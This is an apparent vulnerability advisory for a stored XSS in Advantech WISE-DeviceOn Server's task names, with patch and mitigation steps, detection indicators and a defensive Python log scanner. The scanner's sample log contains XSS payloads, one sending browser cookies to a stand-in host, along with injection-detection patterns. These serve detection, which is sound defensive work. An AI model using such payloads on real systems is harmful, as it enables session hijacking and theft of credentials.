CVE-2025-34257
📋 TL;DR
This stored XSS vulnerability in Advantech WISE-DeviceOn Server allows authenticated attackers to inject malicious scripts into task names that execute when other users view affected tasks. The vulnerability affects all versions prior to 5.4, potentially enabling session hijacking and unauthorized actions. Only authenticated users can exploit this vulnerability.
💻 Affected Systems
- Advantech WISE-DeviceOn Server
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
A low-privileged account plants a task name that executes in an administrator's browser; the attacker then acts with the administrator's session, compromises other users' sessions, exfiltrates sensitive data, and performs unauthorized actions across the entire DeviceOn deployment.
Likely Case
Attacker hijacks user sessions to perform unauthorized actions, steal credentials, or modify system configurations within their authenticated access level.
If Mitigated
Limited impact due to proper input validation, output encoding, and Content Security Policy preventing script execution.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.4
Restart Required: Yes
Instructions:
1. Download WISE-DeviceOn Server version 5.4 or later from the Advantech support portal.
2. Back up the current configuration and data.
3. Stop the DeviceOn service.
4. Install the updated version.
5. Restart the service.
6. Verify the fix by checking the version.
🔧 Temporary Workarounds
Input Validation Filter
Implement web application firewall or reverse-proxy filtering that decodes and inspects defined_name parameter values submitted to /rmm/v1/action/defined and rejects HTML tags, event-handler attributes and javascript: URIs. This is a stopgap: filters can be bypassed with alternative encodings, and the root cause (missing output encoding on the Overview page) is only removed by the patch.
Content Security Policy
Implement strict CSP headers (for example, no inline scripts and a script-src allowlist of the application's own origin) so an injected task name cannot execute even if it reaches the page unencoded.
🧯 If You Can't Patch
- Implement strict input validation and output encoding for the defined_name parameter
- Restrict access to the /rmm/v1/action/defined endpoint to only necessary users
🔍 How to Verify
Check if Vulnerable:
Check whether the installed version is below 5.4. On a non-production instance, create a task whose defined_name contains a harmless HTML marker (for example, a bold tag around a unique string) and open the Overview page: if the marker is rendered as HTML rather than shown as literal text, the instance is vulnerable.
Check Version:
Check DeviceOn web interface admin panel or consult system documentation for version information
Verify Fix Applied:
After patching to 5.4 or later, repeat the test: HTML/script input submitted in the defined_name parameter must be displayed as literal text on the Overview page and must not execute or render as markup.
📡 Detection & Monitoring
Log Indicators:
- POST requests to /rmm/v1/action/defined whose defined_name parameter contains HTML tags (script, img, svg, iframe), event-handler attributes (onerror=, onload=) or javascript: URIs, including URL-encoded or HTML-entity-encoded forms
- Multiple failed login attempts followed by successful authentication and task creation
Network Indicators:
- HTTP requests containing script tags, event-handler attributes or JavaScript code in the defined_name parameter
- Unusual outbound connections from operators' browsers (not the DeviceOn server: the injected script runs client-side) to unknown hosts shortly after the Overview page is viewed, which is where exfiltrated session data would go
SIEM Query:
source="deviceon-logs" AND uri_path="/rmm/v1/action/defined" AND param="defined_name" AND (value CONTAINS "<script" OR value CONTAINS "javascript:" OR value CONTAINS "onerror=" OR value CONTAINS "onload=")
Parenthesize the OR terms as above; without the parentheses the query matches any event containing "javascript:" regardless of endpoint. URL-decode the parameter value before matching, otherwise encoded payloads such as %3Cscript%3E are missed.
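The detection logic above, and the request filtering described under Temporary Workarounds, come down to the same check: decode the defined_name value a request sends to /rmm/v1/action/defined and look for HTML or script constructs in it. The following is an added example written for this page, not Advantech code and not the DeviceOn API: it assumes an access log that records method, path and request body on one line, and it assumes defined_name is carried in a JSON or form-encoded POST body (the advisory names the parameter and endpoint but not the body format). The log lines are constructed for the example. The `is_suspicious` check is what a reverse proxy would run before forwarding the request; `scan_log` runs the same check over past traffic.

```python
"""Detect or block script injection in the defined_name parameter.

Added example for CVE-2025-34257; not Advantech code. Assumptions:
  - access log format: "<ts> <src-ip> <user> <METHOD> <path> <status> <body>"
  - defined_name is sent in the POST body as JSON or form-encoding
    (the real DeviceOn request format is not given in the advisory)
"""
import html
import json
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/rmm/v1/action/defined"

# Constructs that have no business in a task name. Matched case-insensitively
# after decoding, so encoded payloads are caught too.
SUSPICIOUS = [
    re.compile(r"<\s*/?\s*(script|iframe|svg|img|object|embed)\b", re.I),
    re.compile(r"\bjavascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),   # onerror=, onload=, onclick= ...
    re.compile(r"<[^>]*\bsrc\s*=", re.I),
]


def normalize(value: str) -> str:
    """Undo the encodings an attacker can layer on: URL-encoding (applied
    twice to catch double encoding) followed by HTML entities."""
    out = value
    for _ in range(2):
        out = unquote(out)
    return html.unescape(out)


def extract_defined_name(body: str) -> Optional[str]:
    """Return the defined_name field of a JSON or form-encoded body, or None."""
    body = body.strip()
    if body.startswith("{"):
        try:
            data = json.loads(body)
        except json.JSONDecodeError:
            return None
        value = data.get("defined_name")
        return str(value) if value is not None else None
    values = parse_qs(body, keep_blank_values=True).get("defined_name")
    return values[0] if values else None


def is_suspicious(value: str) -> bool:
    """True if the decoded task name contains an HTML/JS injection construct."""
    text = normalize(value)
    return any(p.search(text) for p in SUSPICIOUS)


LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<user>\S+) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) (?P<status>\d{3}) (?P<body>.*)$"
)


def scan_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, source, user, decoded payload) for every task
    definition request whose defined_name looks like an injection attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        name = extract_defined_name(m["body"])
        if name is not None and is_suspicious(name):
            hits.append((m["ts"], m["src"], m["user"], normalize(name)))
    return hits


# Constructed sample log: one benign task, three injection attempts using
# different encodings, and one GET that is not a task definition at all.
SAMPLE_LOG = [
    '2025-12-09T10:01:02Z 10.0.0.5 operator POST /rmm/v1/action/defined 200 '
    '{"defined_name":"Nightly reboot","action":"reboot"}',
    '2025-12-09T10:03:17Z 10.0.0.9 contractor POST /rmm/v1/action/defined 200 '
    '{"defined_name":"Backup<img src=x onerror=fetch(\'//198.51.100.7/\'+document.cookie)>","action":"noop"}',
    '2025-12-09T10:04:40Z 10.0.0.9 contractor POST /rmm/v1/action/defined 200 '
    'defined_name=%253Cscript%253Ealert(1)%253C%252Fscript%253E&action=noop',
    '2025-12-09T10:05:00Z 10.0.0.5 operator GET /rmm/v1/action/defined 200 -',
    '2025-12-09T10:06:11Z 10.0.0.9 contractor POST /rmm/v1/action/defined 200 '
    '{"defined_name":"Sync&lt;svg onload=alert(1)&gt;","action":"noop"}',
]

if __name__ == "__main__":
    for ts, src, user, payload in scan_log(SAMPLE_LOG):
        print(f"{ts} {src} {user}: {payload!r}")
```

Two notes on use. The double URL-decode and entity decode are deliberate: the third and fifth sample lines would slip past a naive `CONTAINS "<script>"` match, and a WAF rule that matches before decoding is bypassed the same way. The event-handler pattern will occasionally flag a legitimate name such as "Power on=auto", so treat hits from the log scan as triage candidates and, if the check is used to block requests at a proxy, expect a small number of false rejections until the patch removes the need for it.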
🔗 References
- https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn-20251208-2.pdf
- https://docs.deviceon.advantech.com/docs/resource/
- https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-defined